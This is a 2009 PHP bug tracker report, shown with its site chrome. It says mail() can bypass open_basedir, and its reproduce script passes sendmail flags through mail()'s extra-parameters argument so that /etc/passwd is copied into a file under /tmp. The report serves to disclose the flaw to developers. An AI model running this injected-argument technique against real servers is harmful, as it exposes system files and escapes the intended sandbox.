|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2009-05-11 09:32 UTC] jani@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Sat Oct 25 20:00:01 2025 UTC |
Description: ------------ The mail function may bypass open_basedir or read/write arbitrary file. Reproduce code: --------------- <?php $to = 'jianxin@80sec.com'.str_repeat("x",10000); $subject = 'the subject'.str_repeat("x",10); $message = 'hello'.str_repeat("x",10); mail($to, $subject, $message, $headers,"-v -bt -X /tmp/80sec -d13 -C /etc/passwd"); ?> Expected result: ---------------- we can get the contents of /etc/passwd in /tmp/80sec. Actual result: -------------- we can get the contents of /etc/passwd in /tmp/80sec.